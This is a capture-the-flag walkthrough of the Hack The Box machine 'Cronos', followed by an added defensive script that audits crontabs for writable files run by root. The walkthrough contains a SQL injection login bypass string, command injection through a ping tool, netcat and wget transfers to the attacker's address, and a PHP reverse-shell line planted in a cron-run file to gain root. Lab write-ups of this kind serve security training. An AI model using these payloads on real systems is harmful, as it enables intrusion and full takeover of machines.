Cronos was released in 2017 and is rated as medium.
By scanning the machine, we found out that there is DNS running on the system. By querying the DNS server, we found a subdomain called admin.cronos.htb. That subdomain is vulnerable to a SQL injection bypass. After we successfully bypassed the login page, we found a ping tool that is vulnerable to code execution, which enabled us to gain user-level system access. With user-level access in hand, we wanted to expand it to root-level system access, and we were able to do that by exploiting a cron job.
nmap -sV -sC 10.10.10.13
I saw that port 53 (DNS) is open, so I tried to enumerate the DNS and query the DNS records.
dig axfr @10.10.10.13 cronos.htb
I added admin.cronos.htb to the /etc/hosts file.
Web Page Enumeration
We see a login page.
I tried a basic SQL bypass and succeeded.
' or 1=1-- -
After we successfully logged in, we see the following page.
I started Burp Suite, and intercepted the request.
Basic Command Execution
I tried to ping myself first, in order to test whether we indeed have command execution.
Before I executed it, I started tcpdump in order to catch the ICMP packet.
tcpdump -i tun0 icmp
Getting Reverse Shell
Now that our command execution is confirmed, we can change the ping payload to a reverse shell payload.
Now we have a reverse shell.
By basic enumeration, I found an interesting crontab.
File Transfer with Netcat
By viewing the directory, I saw that I can modify one file (artisan). By putting a reverse shell there, we will get a root shell back.
First, I downloaded the file to my system in order to modify it.
On Target System: nc -nv 10.10.14.4 1234 < artisan
On My Own System: nc -lnvp 1234 > artisan
Modify Artisan File
I added the following 2 lines to the file:
exec("/bin/sh -i <&3 >&3 2>&3");
After this I transferred the file back to the target system and overwrote the current artisan file.
On Target System: wget http://10.10.14.4:8000/artisan
On Kali System: python3 -m http.server
Now we have a root shell.
whoami && ifconfig && cat root.txt; echo
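A defender-side check for the misconfiguration the cron job escalation relied on, as an added example that is not part of the original write-up: it reads a system-format crontab and flags files run by root's jobs that are group- or world-writable or not owned by root. The crontab line, the temporary paths and the function names are constructed for this demo.

```shell
#!/bin/sh
# Added example: flag files run by root cron jobs that a non-root user could modify.

# check_path PATH OWNER: print a finding if PATH is group/world-writable
# or not owned by OWNER. -L follows symlinks so the target itself is judged.
check_path() {
    info=$(ls -ldL -- "$1" 2>/dev/null) || return 0
    mode=${info%% *}
    owner=$(printf '%s\n' "$info" | awk '{print $3}')
    case $mode in
        ?????w*|????????w*) echo "RISK $1 writable-by-group-or-other" ;;
    esac
    [ "$owner" = "$2" ] || echo "RISK $1 owner=$owner"
}

# audit_crontab FILE [OWNER]: FILE uses the system crontab layout
# "m h dom mon dow user command" (@reboot-style shortcuts are not handled).
# OWNER (default root) is the only account allowed to own what root runs.
# The body is a subshell so set -f (no globbing) does not leak to the caller.
audit_crontab() (
    set -f
    trusted=${2:-root}
    while read -r m h dom mon dow user cmd; do
        case $m in ''|\#*) continue ;; esac      # blank lines and comments
        [ "$user" = root ] || continue            # also skips VAR=value lines
        for word in $cmd; do
            case $word in /*) ;; *) continue ;; esac
            [ -f "$word" ] || continue            # regular files only, not /dev/null
            check_path "$word" "$trusted"
            check_path "$(dirname "$word")" "$trusted"   # writable dir = replaceable file
        done
    done < "$1"
)

# Constructed demo: a root job running a group-writable script in a temp dir.
demo() {
    d=$(mktemp -d) || return 1
    printf '<?php // placeholder\n' > "$d/artisan"
    chmod 664 "$d/artisan"
    printf '# constructed sample\n* * * * * root php %s/artisan schedule:run >> /dev/null 2>&1\n' "$d" > "$d/crontab"
    audit_crontab "$d/crontab"
    rm -rf "$d"
}
demo
```

On a real host, point audit_crontab at /etc/crontab and the files under /etc/cron.d; any RISK line means a non-root account can change what root executes.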
Made by: IceL0rd
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.